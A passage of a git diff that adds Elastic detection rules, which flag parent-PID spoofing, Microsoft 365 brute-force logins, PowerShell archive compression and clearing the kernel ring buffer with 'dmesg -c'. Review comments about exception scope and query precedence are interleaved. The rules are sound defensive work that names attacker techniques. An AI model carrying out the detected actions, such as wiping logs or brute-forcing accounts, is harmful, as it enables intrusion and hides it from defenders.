(x86)\\\\LogMeIn\\\\x64\\\\LogMeIn.exe\",\n \"?:\\\\Program Files (x86)\\\\EMC Captiva\\\\Captiva Cloud Runtime\\\\Emc.Captiva.WebCaptureRunner.exe\",\n \"?:\\\\Program Files\\\\Freedom Scientific\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome Remote Desktop\\\\*\\\\remoting_host.exe\",\n \"?:\\\\Program Files (x86)\\\\GoToAssist Remote Support Customer\\\\*\\\\g2ax_comm_customer.exe\") and\n not (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Netwrix Corporation\" and\n process.name : \"adcrcpy.exe\" and process.parent.executable : (\n \"?:\\\\Program Files (x86)\\\\Netwrix Auditor\\\\Active Directory Auditing\\\\Netwrix.ADA.EventCollector.exe\",\n \"?:\\\\Program Files (x86)\\\\Netwrix Auditor\\\\Active Directory Auditing\\\\Netwrix.ADA.Analyzer.exe\",\n \"?:\\\\Netwrix Auditor\\\\Active Directory 
Auditing\\\\Netwrix.ADA.EventCollector.exe\"\n )\n )\n", + "references": [ + "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6", + "https://blog.didierstevens.com/2017/03/20/", + "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.parent.Ext.real.pid", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "26b01043-4f04-4d2f-882a-5a1d2e95751b", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.004", + "name": "Parent PID 
Spoofing", + "reference": "https://attack.mitre.org/techniques/T1134/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "26b01043-4f04-4d2f-882a-5a1d2e95751b_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_104.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_104.json new file mode 100644 index 00000000000..8366016c5db --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_104.json 
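Review bot: The signer-based exception `process.code_signature.subject_name in ("philandro Software GmbH", …, "Dell Inc") and process.code_signature.trusted == true` exempts every binary from those seven vendors regardless of path, parent or child name, which is much broader than the Netwrix exception further down that pins `process.name : "adcrcpy.exe"` together with specific parent executables. Tightening the vendor block to the same shape (signer plus the concrete parent or child path that caused the false positive) would keep the exception scoped to the observed benign case. A short `/* … */` comment naming the product behind each signer, as the query already does for `seclogon` and `AM_Delta_Patch`, would also make future maintenance of the list easier.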
@@ -0,0 +1,97 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic",
+ "Willem D'Haese",
+ "Austin Songer"
+ ],
+ "description": "Identifies attempts to brute force a Microsoft 365 user account. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts.",
+ "false_positives": [
+ "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives."
+ ],
+ "from": "now-30m",
+ "index": [
+ "filebeat-*",
+ "logs-o365*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Attempts to Brute Force a Microsoft 365 User Account",
+ "note": "",
+ "query": "event.dataset:o365.audit and event.provider:(AzureActiveDirectory or Exchange) and\n event.category:authentication and event.action:(UserLoginFailed or PasswordLogonInitialAuthUsingPassword) and\n not o365.audit.LogonError:(UserAccountNotFound or EntitlementGrantsNotFound or UserStrongAuthEnrollmentRequired or\n UserStrongAuthClientAuthNRequired or InvalidReplyTo)\n",
+ "references": [
+ "https://blueteamblog.com/7-ways-to-monitor-your-office-365-logs-using-siem"
+ ],
+ "related_integrations": [
+ {
+ "package": "o365",
+ "version": "^2.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "o365.audit.LogonError",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d",
+ "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "high",
+ "tags": [
+ "Domain: Cloud",
+ "Data Source: Microsoft 365",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1110",
+ "name": "Brute Force",
+ "reference": "https://attack.mitre.org/techniques/T1110/"
+ }
+ ]
+ }
+ ],
+ "threshold": {
+ "field": [
+ "user.id"
+ ],
+ "value": 10
+ },
+ "timestamp_override": "event.ingested",
+ "type": "threshold",
+ "version": 104
+ },
+ "id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d_104",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_106.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_106.json
new file mode 100644
index 00000000000..befc1c688aa
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_106.json
@@ -0,0 +1,97 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic",
+ "Willem D'Haese",
+ "Austin Songer"
+ ],
+ "description": "Identifies attempts to brute force a Microsoft 365 user account. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts.",
+ "false_positives": [
+ "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives."
+ ],
+ "from": "now-30m",
+ "index": [
+ "filebeat-*",
+ "logs-o365*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Attempts to Brute Force a Microsoft 365 User Account",
+ "note": "",
+ "query": "event.dataset:o365.audit and event.provider:(AzureActiveDirectory or Exchange) and\n event.category:authentication and event.action:(UserLoginFailed or PasswordLogonInitialAuthUsingPassword) and\n not o365.audit.LogonError:(UserAccountNotFound or EntitlementGrantsNotFound or UserStrongAuthEnrollmentRequired or\n UserStrongAuthClientAuthNRequired or InvalidReplyTo)\n",
+ "references": [
+ "https://blueteamblog.com/7-ways-to-monitor-your-office-365-logs-using-siem"
+ ],
+ "related_integrations": [
+ {
+ "package": "o365",
+ "version": "^2.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "o365.audit.LogonError",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d",
+ "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "high",
+ "tags": [
+ "Domain: Cloud",
+ "Data Source: Microsoft 365",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1110",
+ "name": "Brute Force",
+ "reference": "https://attack.mitre.org/techniques/T1110/"
+ }
+ ]
+ }
+ ],
+ "threshold": {
+ "field": [
+ "user.id"
+ ],
+ "value": 10
+ },
+ "timestamp_override": "event.ingested",
+ "type": "threshold",
+ "version": 106
+ },
+ "id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d_106",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_207.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_207.json
new file mode 100644
index 00000000000..67010786c06
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_207.json
@@ -0,0 +1,97 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic",
+ "Willem D'Haese",
+ "Austin Songer"
+ ],
+ "description": "Identifies attempts to brute force a Microsoft 365 user account. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts.",
+ "false_positives": [
+ "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives."
+ ],
+ "from": "now-30m",
+ "index": [
+ "filebeat-*",
+ "logs-o365*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Attempts to Brute Force a Microsoft 365 User Account",
+ "note": "",
+ "query": "event.dataset:o365.audit and event.provider:(AzureActiveDirectory or Exchange) and\n event.category:authentication and event.action:(UserLoginFailed or PasswordLogonInitialAuthUsingPassword) and\n not o365.audit.LogonError:(UserAccountNotFound or EntitlementGrantsNotFound or UserStrongAuthEnrollmentRequired or\n UserStrongAuthClientAuthNRequired or InvalidReplyTo)\n",
+ "references": [
+ "https://blueteamblog.com/7-ways-to-monitor-your-office-365-logs-using-siem"
+ ],
+ "related_integrations": [
+ {
+ "package": "o365",
+ "version": "^2.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "o365.audit.LogonError",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d",
+ "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "high",
+ "tags": [
+ "Domain: Cloud",
+ "Data Source: Microsoft 365",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1110",
+ "name": "Brute Force",
+ "reference": "https://attack.mitre.org/techniques/T1110/"
+ }
+ ]
+ }
+ ],
+ "threshold": {
+ "field": [
+ "user.id"
+ ],
+ "value": 10
+ },
+ "timestamp_override": "event.ingested",
+ "type": "threshold",
+ "version": 207
+ },
+ "id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d_207",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_105.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_105.json
new file mode 100644
index 00000000000..606f6f5d5bf
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_105.json
@@ -0,0 +1,152 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "Identifies the use of Cmdlets and methods related to archive compression activities. Adversaries will often compress and encrypt data in preparation for exfiltration.",
+ "filters": [
+ {
+ "meta": {
+ "negate": true
+ },
+ "query": {
+ "wildcard": {
+ "file.path": {
+ "case_insensitive": true,
+ "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\\\\*"
+ }
+ }
+ }
+ },
+ {
+ "meta": {
+ "negate": true
+ },
+ "query": {
+ "wildcard": {
+ "file.path": {
+ "case_insensitive": true,
+ "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*"
+ }
+ }
+ }
+ },
+ {
+ "meta": {
+ "negate": true
+ },
+ "query": {
+ "wildcard": {
+ "file.path": {
+ "case_insensitive": true,
+ "value": "?:\\\\Program Files\\\\Microsoft Dependency Agent\\\\plugins\\\\*"
+ }
+ }
+ }
+ },
+ {
+ "meta": {
+ "negate": true
+ },
+ "query": {
+ "wildcard": {
+ "file.path": {
+ "case_insensitive": true,
+ "value": "?:\\\\Program Files\\\\Azure\\\\StorageSyncAgent\\\\AFSDiag.ps1"
+ }
+ }
+ }
+ }
+ ],
+ "from": "now-119m",
+ "index": [
+ "winlogbeat-*",
+ "logs-windows.powershell*"
+ ],
+ "interval": "60m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "PowerShell Script with Archive Compression Capabilities",
+ "query": "event.category:process and host.os.type:windows and\n(\n powershell.file.script_block_text : (\n \"IO.Compression.ZipFile\" or\n \"IO.Compression.ZipArchive\" or\n \"ZipFile.CreateFromDirectory\" or\n \"IO.Compression.BrotliStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GZipStream\" or\n \"IO.Compression.ZLibStream\"\n ) and \n powershell.file.script_block_text : (\n \"CompressionLevel\" or\n \"CompressionMode\" or\n \"ZipArchiveMode\"\n ) or\n powershell.file.script_block_text : \"Compress-Archive\"\n)\n",
+ "related_integrations": [
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "powershell.file.script_block_text",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293",
+ "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Collection",
+ "Data Source: PowerShell Logs",
+ "Rule Type: BBR"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0009",
+ "name": "Collection",
+ "reference": "https://attack.mitre.org/tactics/TA0009/"
+ },
+ "technique": [
+ {
+ "id": "T1560",
+ "name": "Archive Collected Data",
+ "reference": "https://attack.mitre.org/techniques/T1560/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.001",
+ "name": "PowerShell",
+ "reference": "https://attack.mitre.org/techniques/T1059/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 105
+ },
+ "id": "27071ea3-e806-4697-8abc-e22c92aa4293_105",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_5.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_5.json
new file mode 100644
index 00000000000..a911973541d
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_5.json
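Review bot: The four `filters` entries in this version key on `file.path`, yet `required_fields` lists only `event.category`, `host.os.type` and `powershell.file.script_block_text`; version 5 in the next hunk, where the same exclusions sit inside the query, still declares `{"ecs": true, "name": "file.path", "type": "keyword"}`, so the field list appears to have been pruned along with the query move rather than by design — confirm whether the exporter is meant to ignore filter fields, otherwise the entry should stay. Separately, the `query` here and in version 5 chains `... : (...) and ... : (...) or ... : "Compress-Archive"` without inner parentheses; KQL gives `and` precedence over `or`, so the intended `(A and B) or C` is what runs, but writing it as `(powershell.file.script_block_text : (...) and powershell.file.script_block_text : (...)) or powershell.file.script_block_text : "Compress-Archive"` would spare the next maintainer from having to recall the precedence table.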
@@ -0,0 +1,103 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "Identifies the use of Cmdlets and methods related to archive compression activities. Adversaries will often compress and encrypt data in preparation for exfiltration.",
+ "from": "now-119m",
+ "index": [
+ "winlogbeat-*",
+ "logs-windows.powershell*"
+ ],
+ "interval": "60m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "PowerShell Script with Archive Compression Capabilities",
+ "query": "event.category:process and host.os.type:windows and\n(\n powershell.file.script_block_text : (\n \"IO.Compression.ZipFile\" or\n \"IO.Compression.ZipArchive\" or\n \"ZipFile.CreateFromDirectory\" or\n \"IO.Compression.BrotliStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GZipStream\" or\n \"IO.Compression.ZLibStream\"\n ) and \n powershell.file.script_block_text : (\n \"CompressionLevel\" or\n \"CompressionMode\" or\n \"ZipArchiveMode\"\n ) or\n powershell.file.script_block_text : \"Compress-Archive\"\n) and \n not file.path : (\n ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\Downloads\\\\\\\\* or\n ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\DataCollection\\\\\\\\* or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft?Dependency?Agent\\\\\\\\plugins\\\\\\\\* or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Azure\\\\\\\\StorageSyncAgent\\\\\\\\AFSDiag.ps1\n )\n",
+ "related_integrations": [
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "powershell.file.script_block_text",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293",
+ "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Collection",
+ "Data Source: PowerShell Logs",
+ "Rule Type: BBR"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0009",
+ "name": "Collection",
+ "reference": "https://attack.mitre.org/tactics/TA0009/"
+ },
+ "technique": [
+ {
+ "id": "T1560",
+ "name": "Archive Collected Data",
+ "reference": "https://attack.mitre.org/techniques/T1560/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.001",
+ "name": "PowerShell",
+ "reference": "https://attack.mitre.org/techniques/T1059/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 5
+ },
+ "id": "27071ea3-e806-4697-8abc-e22c92aa4293_5",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_2.json b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_2.json
new file mode 100644
index 00000000000..774a3acc07c
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_2.json 
@@ -0,0 +1,110 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Monitors for the deletion of the kernel ring buffer events through dmesg. Attackers may clear kernel ring buffer events to evade detection after installing a Linux kernel module (LKM).",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*",
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Attempt to Clear Kernel Ring Buffer",
+ "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\") and\nevent.type == \"start\" and process.name == \"dmesg\" and process.args : \"-c\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "2724808c-ba5d-48b2-86d2-0002103df753",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ },
+ {
+ "id": "T1070",
+ "name": "Indicator Removal",
+ "reference": "https://attack.mitre.org/techniques/T1070/",
+ "subtechnique": [
+ {
+ "id": "T1070.002",
+ "name": "Clear Linux or Mac System Logs",
+ "reference": "https://attack.mitre.org/techniques/T1070/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+ },
+ "id": "2724808c-ba5d-48b2-86d2-0002103df753_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_3.json b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_3.json new file mode 100644 index 00000000000..17834dbdc1a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2724808c-ba5d-48b2-86d2-0002103df753_3.json 
@@ -0,0 +1,110 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Monitors for the deletion of the kernel ring buffer events through dmesg. Attackers may clear kernel ring buffer events to evade detection after installing a Linux kernel module (LKM).",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*",
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Attempt to Clear Kernel Ring Buffer",
+ "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"dmesg\" and process.args == \"-c\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "2724808c-ba5d-48b2-86d2-0002103df753",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the 